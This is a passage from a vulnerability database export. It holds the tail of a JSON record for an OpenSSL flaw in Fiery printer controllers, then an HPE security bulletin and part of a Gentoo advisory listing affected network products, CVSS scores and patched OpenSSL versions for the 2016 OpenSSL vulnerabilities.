"http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4577" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4576" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0027" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4619" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0050" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201203-12.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4109" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-4108" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2333" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-2333.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-2110.html" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=1.0.2" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0884.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1165.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-4577.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0059.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4354" }, { "trust": 0.1, "url": "http://secunia.com/" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "http://lists.grok.org.uk/full-disclosure-charter.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1473" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-e41b71e6cfbe471dbd029deaab" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1583" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3192" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2691" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0027" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4108" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4576" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4619" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4109" }, { "trust": 0.1, "url": "http://www.mandriva.com/security/advisories" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4619" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "NVD", "id": "CVE-2011-4619" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4619" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "NVD", "id": "CVE-2011-4619" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-03-18T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2012-01-06T00:00:00", "db": "VULMON", "id": "CVE-2011-4619" }, { "date": "2012-01-05T00:00:00", "db": "BID", "id": "51281" }, { "date": "2012-06-28T03:39:12", "db": "PACKETSTORM", "id": "114272" }, { "date": "2012-02-21T15:34:06", "db": "PACKETSTORM", "id": "110012" }, { "date": "2012-03-06T23:57:33", "db": "PACKETSTORM", "id": "110482" }, { "date": "2012-09-25T00:15:29", "db": "PACKETSTORM", "id": "116825" }, { "date": "2012-01-24T23:58:58", "db": "PACKETSTORM", "id": "109053" }, { "date": "2012-01-16T02:59:37", "db": "PACKETSTORM", "id": "108700" }, { "date": "2012-06-12T22:49:22", "db": "PACKETSTORM", "id": "113582" }, { "date": "2012-01-17T01:20:23", "db": "PACKETSTORM", "id": "108735" }, { "date": "2012-01-06T01:55:01.003000", "db": "NVD", "id": "CVE-2011-4619" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-05-02T00:00:00", "db": "CERT/CC", "id": "VU#737740" }, { "date": "2016-08-23T00:00:00", "db": "VULMON", "id": "CVE-2011-4619" }, { "date": "2015-04-13T21:31:00", "db": "BID", "id": "51281" }, { "date": "2016-08-23T02:04:40.557000", "db": "NVD", "id": "CVE-2011-4619" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "108735" } ], "trust": 0.4 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL", "sources": [ { "db": "CERT/CC", "id": "VU#737740" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 } }
var-201605-0078
Vulnerability from variot
The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the "negative zero" issue. OpenSSL is prone to remote memory-corruption vulnerability. Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the application using the vulnerable library. Failed exploit attempts will result in denial-of-service conditions. Following product versions are affected: OpenSSL versions 1.0.2 prior to 1.0.2c OpenSSL versions 1.0.1 prior to 1.0.1o. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03756en_us Version: 1
HPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-06-05 Last Updated: 2017-06-05
Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE network products including Comware 7, iMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.
References:
- CVE-2016-2105 - Remote Denial of Service (DoS)
- CVE-2016-2106 - Remote Denial of Service (DoS)
- CVE-2016-2107 - Remote disclosure of sensitive information
- CVE-2016-2108 - Remote Denial of Service (DoS)
- CVE-2016-2109 - Remote Denial of Service (DoS)
- CVE-2016-2176 - Remote Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- HP Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2105
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2106
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2107
3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVE-2016-2108
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-2109
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-2176
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates available to resolve the vulnerabilities in the Comware 7, iMC and VCX products running OpenSSL.
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 10500 (Comware 7) - Version: R7184
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5900/5920 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR1000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR2000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR3000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR4000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- VSR (Comware 7) - Version: E0324
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7900 (Comware 7) - Version: R2152
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130 (Comware 7) - Version: R3115
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6125XLG - Version: R2422P02
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6127XLG - Version: R2422P02
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- Moonshot - Version: R2432
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 1950 (Comware 7) - Version: R3115
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7500 (Comware 7) - Version: R7184
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5510HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5940 - Version: R2509
- HP Network Products
- JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch
- JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch
- JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch
- JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch
- JH396A HPE FlexFabric 5940 32QSFP+ Switch
- JH397A HPE FlexFabric 5940 2-slot Switch
- JH398A HPE FlexFabric 5940 4-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5950 - Version: R6123
- HP Network Products
- JH321A HPE FlexFabric 5950 32QSFP28 Switch
- JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch
- JH404A HPE FlexFabric 5950 4-slot Switch
- 12900E (Comware 7) - Version: R2609
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
iMC Products
- iNode PC 7.2 (E0410) - Version: 7.2 E0410
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
- iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
VCX Products
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 2 June 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Gentoo Linux Security Advisory GLSA 201612-16
https://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 07, 2016 Bugs: #581234, #585142, #585276, #591454, #592068, #592074, #592082, #594500, #595186 ID: 201612-16
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which allows attackers to conduct a time based side-channel attack.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers and the International Association for Cryptologic Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really are Constant-Time" for further details. Additionally, a time based side-channel attack may allow a local attacker to recover a private DSA key.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
[ 1 ] CVE-2016-2105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105 [ 2 ] CVE-2016-2106 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106 [ 3 ] CVE-2016-2107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107 [ 4 ] CVE-2016-2108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108 [ 5 ] CVE-2016-2109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109 [ 6 ] CVE-2016-2176 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176 [ 7 ] CVE-2016-2177 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177 [ 8 ] CVE-2016-2178 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178 [ 9 ] CVE-2016-2180 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180 [ 10 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 11 ] CVE-2016-6304 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304 [ 12 ] CVE-2016-6305 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305 [ 13 ] CVE-2016-6306 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306 [ 14 ] CVE-2016-7052 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052 [ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time http://eprint.iacr.org/2016/594.pdf
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
